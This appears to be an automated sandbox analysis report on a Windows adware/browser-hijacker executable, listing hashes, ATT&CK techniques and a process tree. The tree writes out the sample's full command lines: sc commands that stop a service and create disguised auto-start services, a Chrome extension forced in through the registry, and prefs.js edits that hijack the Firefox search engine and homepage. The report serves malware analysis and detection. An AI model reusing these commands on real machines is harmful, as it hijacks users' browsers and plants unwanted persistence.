208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5

Analysis

max time kernel
209s
max time network
247s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
25-11-2022 22:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
Size

776KB
MD5

d1acfda5165dd86b7a7c02a914a5f840
SHA1

27df9a373ebfbf747fe1bda42d4794d2bfa7475b
SHA256

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5
SHA512

4d9bfa86b9da0d690f3256cd6be89ba32d7035e9fad4699a0e823a636188f784b2b22bbd55c805c7bee429db3578b7d3810da195241d3189cd2952938c970d30
SSDEEP

12288:0zNq8W0SE8wvSS0dvS3O4b1julJ3MzDme8G1C88tfwDdwnCuw:0zNq8W0SE80SScoO4bBuJCD/6W9uw

Score

8^/10

discovery evasion persistence spyware stealer

Malware Config

Signatures

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops file in Program Files directory 3 IoCs

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.execmd.exe

description	ioc	process
File created	C:\Program Files (x86)\Yaimo\games.exe	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
File opened for modification	C:\Program Files (x86)\Yaimo\games.exe	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
File created	C:\Program Files (x86)\Yaimo\bsp	cmd.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1768 sc.exe
1032 sc.exe
4016 sc.exe
5084 sc.exe
3480 sc.exe
3524 sc.exe
4684 sc.exe
3916 sc.exe
3140 sc.exe
3172 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
1768	sc.exe
1032	sc.exe
4016	sc.exe
5084	sc.exe
3480	sc.exe
3524	sc.exe
4684	sc.exe
3916	sc.exe
3140	sc.exe
3172	sc.exe

Enumerates system info in registry 2 TTPs 5 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Modifies Internet Explorer settings 1 TTPs 5 IoCs

adware spyware

Modify Registry

T1112

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\SuggestionsURLFallback = "http://www.yaimo.com/search?q={searchTerms}"	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPageShow = "1"	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\UseHomepageForNewTab = "1"	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\URL = "http://www.yaimo.com/search?q={searchTerms}"	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}\TopResultURLFallback = "http://www.yaimo.com/search?q={searchTerms}"	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

pid	process
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 2488 wrote to memory of 4460	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4460	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4460	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4884	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4884	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4884	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 4884 wrote to memory of 3480	4884	cmd.exe	sc.exe
PID 4884 wrote to memory of 3480	4884	cmd.exe	sc.exe
PID 4884 wrote to memory of 3480	4884	cmd.exe	sc.exe
PID 4460 wrote to memory of 1768	4460	cmd.exe	sc.exe
PID 4460 wrote to memory of 1768	4460	cmd.exe	sc.exe
PID 4460 wrote to memory of 1768	4460	cmd.exe	sc.exe
PID 2488 wrote to memory of 2908	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 2908	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 2908	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 3104	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 3104	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 3104	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4800	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4800	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4800	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 3104 wrote to memory of 3232	3104	cmd.exe	xcopy.exe
PID 3104 wrote to memory of 3232	3104	cmd.exe	xcopy.exe
PID 3104 wrote to memory of 3232	3104	cmd.exe	xcopy.exe
PID 4800 wrote to memory of 2916	4800	cmd.exe	xcopy.exe
PID 4800 wrote to memory of 2916	4800	cmd.exe	xcopy.exe
PID 4800 wrote to memory of 2916	4800	cmd.exe	xcopy.exe
PID 2488 wrote to memory of 400	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 400	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 400	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 400 wrote to memory of 4624	400	cmd.exe	xcopy.exe
PID 400 wrote to memory of 4624	400	cmd.exe	xcopy.exe
PID 400 wrote to memory of 4624	400	cmd.exe	xcopy.exe
PID 2488 wrote to memory of 4552	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4552	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4552	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 4552 wrote to memory of 4688	4552	cmd.exe	xcopy.exe
PID 4552 wrote to memory of 4688	4552	cmd.exe	xcopy.exe
PID 4552 wrote to memory of 4688	4552	cmd.exe	xcopy.exe
PID 2488 wrote to memory of 2876	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 2876	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 2876	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4764	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4764	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4764	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4548	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4548	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4548	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 424	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 424	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 424	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 3984	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 3984	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 3984	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 2208	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 2208	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 2208	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4336	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4336	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 2488 wrote to memory of 4336	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe
PID 4548 wrote to memory of 1032	4548	cmd.exe	sc.exe
PID 4548 wrote to memory of 1032	4548	cmd.exe	sc.exe
PID 4548 wrote to memory of 1032	4548	cmd.exe	sc.exe
PID 2488 wrote to memory of 3908	2488	208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe
"C:\Users\Admin\AppData\Local\Temp\208e57f24b7eb1e1391080b00f9feec43ba48543c9dcaa7a230c60589c4d5eb5.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2488
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc stop CltMngSvc
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4460
- - C:\Windows\SysWOW64\sc.exe
    sc stop CltMngSvc
    3⤵
    - Launches sc.exe
    PID:1768
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc config CltMngSvc start= disabled
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4884
- - C:\Windows\SysWOW64\sc.exe
    sc config CltMngSvc start= disabled
    3⤵
    - Launches sc.exe
    PID:3480
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" C:/Program Files (x86)/Yaimo/yaimo.crx" /f & reg add "HKEY_LOCAL_MACHINE\Software\Google\Chrome\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl" /v "version" /t "reg_sz" /d "1.0" /f & exit"
  2⤵
  PID:2908
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k "xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\jgapnhijgmmehljdkfkojcoefcddinjl" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl" & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3104
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\jgapnhijgmmehljdkfkojcoefcddinjl" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl"
    3⤵
    - Enumerates system info in registry
    PID:3232
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k "xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\jgapnhijgmmehljdkfkojcoefcddinjl" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl" & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\jgapnhijgmmehljdkfkojcoefcddinjl" "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\jgapnhijgmmehljdkfkojcoefcddinjl"
    3⤵
    - Enumerates system info in registry
    PID:2916
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k "@echo on & for /D %f in ("%SystemDrive%\Users\*") do for /D %d in ("%f\AppData\Roaming\Mozilla\Firefox\Profiles\*.default*") do cd "%d" && xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\searchplugins" searchplugins && echo user_pref("network.automatic-ntlm-auth.trusted-uris", "yaimo.com");>>"prefs.js" && echo user_pref("browser.startup.homepage", "http://yaimo.com");>>"prefs.js" && echo user_pref("keyword.URL", "http://www.yaimo.com/search?q=");>>"prefs.js" && echo user_pref("browser.startup.page", 1);>>"prefs.js" && echo user_pref("browser.newtab.url", "http://yaimo.com");>>"prefs.js" && echo user_pref("browser.search.selectedEngine", "Search in Yaimo");>>"prefs.js" && echo user_pref("browser.search.defaultenginename", "Search in Yaimo");>>"prefs.js" && echo @namespace url("http://www.mozilla.org/keymaster/gatekeeper/there.is.only.xul");>>"chrome/userChrome.css" && echo #search-container {min-width:700px;}>>"chrome/userChrome.css" & set ffile= & cd %windir%"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:400
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "C:\Program Files (x86)\Yaimo\searchplugins" searchplugins
    3⤵
    - Enumerates system info in registry
    PID:4624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /k "@echo on & cd "%APPDATA%" && xcopy /S /Y /i "Mozilla" "%SystemDrive%\Users\Default\AppData\Roaming\Mozilla" && cd "..\Local" && xcopy /S /Y /i "Google" "%SystemDrive%\Users\Default\AppData\Local\Google" & exit"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4552
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "Mozilla" "C:\Users\Default\AppData\Roaming\Mozilla"
    3⤵
    - Enumerates system info in registry
    PID:4688
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /S /Y /i "Google" "C:\Users\Default\AppData\Local\Google"
    3⤵
    - Enumerates system info in registry
    PID:540
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C echo Desktop > "C:\Program Files (x86)\Yaimo\bsp"
  2⤵
  - Drops file in Program Files directory
  PID:2876
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc create ISProtect binpath= "C:\Program Files (x86)\Yaimo\J7ovnyvm2VgnVCPzhtuH.exe" start= auto
  2⤵
  PID:4764
- - C:\Windows\SysWOW64\sc.exe
    sc create ISProtect binpath= "C:\Program Files (x86)\Yaimo\J7ovnyvm2VgnVCPzhtuH.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:3524
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc config ISProtect binpath= "C:\Program Files (x86)\Yaimo\J7ovnyvm2VgnVCPzhtuH.exe" start= auto
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4548
- - C:\Windows\SysWOW64\sc.exe
    sc config ISProtect binpath= "C:\Program Files (x86)\Yaimo\J7ovnyvm2VgnVCPzhtuH.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:1032
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc description ISProtect "Brutal Search Protect"
  2⤵
  PID:424
- - C:\Windows\SysWOW64\sc.exe
    sc description ISProtect "Brutal Search Protect"
    3⤵
    - Launches sc.exe
    PID:4016
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc start ISProtect
  2⤵
  PID:3984
- - C:\Windows\SysWOW64\sc.exe
    sc start ISProtect
    3⤵
    - Launches sc.exe
    PID:4684
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc create SysISec binpath= "C:\Windows\system32\oeWzV7o7N0BwcGALTufB.exe" start= auto
  2⤵
  PID:2208
- - C:\Windows\SysWOW64\sc.exe
    sc create SysISec binpath= "C:\Windows\system32\oeWzV7o7N0BwcGALTufB.exe" start= auto
    3⤵
    - Launches sc.exe
    PID:3916
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc config SysISec binpath= "C:\Windows\system32\oeWzV7o7N0BwcGALTufB.exe" start= delayed-auto
  2⤵
  PID:4336
- - C:\Windows\SysWOW64\sc.exe
    sc config SysISec binpath= "C:\Windows\system32\oeWzV7o7N0BwcGALTufB.exe" start= delayed-auto
    3⤵
    - Launches sc.exe
    PID:3172
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc description SysISec "System Internet Security"
  2⤵
  PID:3908
- - C:\Windows\SysWOW64\sc.exe
    sc description SysISec "System Internet Security"
    3⤵
    - Launches sc.exe
    PID:3140
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C sc start SysISec
  2⤵
  PID:3544
- - C:\Windows\SysWOW64\sc.exe
    sc start SysISec
    3⤵
    - Launches sc.exe
    PID:5084

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

New Service

T1050

Privilege Escalation

New Service

T1050

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
01ee518b532e2077062ce5f185ebd1c3

SHA1
e2805d8ed03efcfe28faae72cdce0debd9246c2e

SHA256
4fded64c3050e81efc3e873473377fdcd6975260a8f80391145a730b3e182200

SHA512
4e3e069575053741de4d74f0ee0ce8ac02c8a10104c4b78fd3e658eedc68dac4e78ce3c05187bb0a3019970c53872f88fffef2fb7c9e383fbe102886240019d4

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data

Filesize
88KB

MD5
bc8a84bd38bf431576f58764643695f8

SHA1
127c7199d8116bd5c2ab1d32a77c57b2832f2557

SHA256
0f9dd6a14ea7ce169285cf4f422140926dcb06126916ae0e7c3b59ef79da5b13

SHA512
1fb404d9fe14095b682a4ace3b3adfde9a77da0c17c242ed4c9b919d76de229a7df4fc08fd19b8213b22533408a1bc40a91c46e7120ddfaaf5bac145c33cff65

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\yrilf55p.default-release\prefs.js

Filesize
6KB

MD5
c8d020f5a9a8ae1d8f73dc72475965bc

SHA1
47b5a044fe83dd9ef0b00568f22222e20754d595

SHA256
771d8912b0a78892ca1356ff5c19fe0d894ac1a28d33d28f0b122b75e7dae360

SHA512
ae4d3fc0dbd1b29fe00528af4551d974492954849274c0196bdaff4708f614918c3030bf351d63b29a598e16318bcfd736949226b29cb8df90775a69a9c7c755

Download Submit
memory/400-141-0x0000000000000000-mapping.dmp

Download
memory/424-149-0x0000000000000000-mapping.dmp

Download
memory/540-155-0x0000000000000000-mapping.dmp

Download
memory/1032-153-0x0000000000000000-mapping.dmp

Download
memory/1768-135-0x0000000000000000-mapping.dmp

Download
memory/2208-151-0x0000000000000000-mapping.dmp

Download
memory/2876-145-0x0000000000000000-mapping.dmp

Download
memory/2908-136-0x0000000000000000-mapping.dmp

Download
memory/2916-140-0x0000000000000000-mapping.dmp

Download
memory/3104-137-0x0000000000000000-mapping.dmp

Download
memory/3140-161-0x0000000000000000-mapping.dmp

Download
memory/3172-163-0x0000000000000000-mapping.dmp

Download
memory/3232-139-0x0000000000000000-mapping.dmp

Download
memory/3480-134-0x0000000000000000-mapping.dmp

Download
memory/3524-158-0x0000000000000000-mapping.dmp

Download
memory/3544-157-0x0000000000000000-mapping.dmp

Download
memory/3908-154-0x0000000000000000-mapping.dmp

Download
memory/3916-160-0x0000000000000000-mapping.dmp

Download
memory/3984-150-0x0000000000000000-mapping.dmp

Download
memory/4016-156-0x0000000000000000-mapping.dmp

Download
memory/4336-152-0x0000000000000000-mapping.dmp

Download
memory/4460-132-0x0000000000000000-mapping.dmp

Download
memory/4548-148-0x0000000000000000-mapping.dmp

Download
memory/4552-143-0x0000000000000000-mapping.dmp

Download
memory/4624-142-0x0000000000000000-mapping.dmp

Download
memory/4684-159-0x0000000000000000-mapping.dmp

Download
memory/4688-144-0x0000000000000000-mapping.dmp

Download
memory/4764-147-0x0000000000000000-mapping.dmp

Download
memory/4800-138-0x0000000000000000-mapping.dmp

Download
memory/4884-133-0x0000000000000000-mapping.dmp

Download
memory/5084-162-0x0000000000000000-mapping.dmp

Download